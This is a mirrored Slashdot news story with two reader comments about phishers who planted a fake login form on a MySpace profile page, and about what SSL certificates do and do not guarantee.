Slashdot Mirror

← Back to Stories (view on slashdot.org)

MySpace Accounts Compromised By Phishers

Posted by ryuzaki0 on from the even-the-wary-beware dept.

An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.

2 of 86 comments (clear)

  1. Re:It's dead... by Anonymous Coward · · Score: 1, Insightful
    Seems Myspace has fixed it.

    No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

    Expect to see a large number of variations on this to show up in the next few days/weeks.

  2. Re:Phishing + SSL by baadger · · Score: 2, Insightful
    How do sites like these get SSL from Verisign? How could that slip though? There was a recent /. Headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 In cases like these, i guess it makes sense

    When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

    Besides, Verisign only guarantee that their private signing keys are secure and therefore noone could have possibly forged the certificate and hence eavesdropped on the data as it passes across the wire. They really couldn't give a rats arse about what data retention or security is like on the other end. In fact refusing to issue MySpace a SSL certificate on the grounds their server side security is shit would be wrong, as this kind of hack is not what SSL was intended to prevent.